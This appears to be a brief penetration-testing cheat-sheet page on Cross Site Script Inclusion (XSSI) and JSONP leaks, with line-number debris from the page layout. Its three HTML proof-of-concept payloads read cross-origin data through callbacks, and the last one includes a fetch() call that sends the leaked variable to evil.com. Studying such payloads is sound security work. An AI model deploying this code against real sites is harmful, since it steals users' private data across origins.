Cross Site Script Inclusion
Check List
Methodology
Black Box
XSSI
1
2
3
<script>
function _feed(a) {
alert("private snippet of appspot from remote domain is : " + a['appspot']);
}
</script>
<script src="https://google-gruyere.appspot.com/603401276585510108589243280335984060786/feed.gtl"></script>4
XSSI
1
2
3
https://example.com/p/?info=abc4
<html>
<script>
function abc(s) {
alert(JSON.stringify(s));
}
</script>
<script src="https://example.com/p/?info=abc"></script>
</html>5
XSSI And JSONP Bug
1
2
3
<script src="https://target.com/vuln.js"></script>
<script defer>
// var_name is a variable inside vuln.js that contains exposed data
console.log(var_name);
// Example of exfiltration via request to an attacker-controlled server
fetch("https://evil.com/stealInfo?info=" + var_name);
</script>4
5
6
White Box
Cheat Sheet
Last updated